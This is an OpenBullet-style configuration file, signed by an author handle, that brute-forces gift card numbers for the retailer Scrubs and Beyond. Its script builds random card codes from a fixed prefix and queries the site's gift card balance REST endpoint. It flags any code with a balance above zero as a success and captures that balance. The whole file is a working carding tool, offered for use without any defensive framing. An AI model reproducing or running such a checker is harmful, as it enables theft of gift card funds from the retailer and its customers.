[SETTINGS]
{
  "Name": "SCRUBS AND BEYOND",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-05-12T14:38:13.673273-04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "i wanna die#0001",
  "Version": "1.2.1",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION RandomString "60357102096304?d?d?d?d?d" -> CAP "CODE" 

REQUEST GET "https://www.scrubsandbeyond.com/index.php/rest/default/V1/giftcard/checkbalance?code=<CODE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" EqualTo "0" 
    KEY "NO CARD" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" GreaterThan "0" 

PARSE "<SOURCE>" LR "" "" CreateEmpty=FALSE -> CAP "BAL" "$" "" 

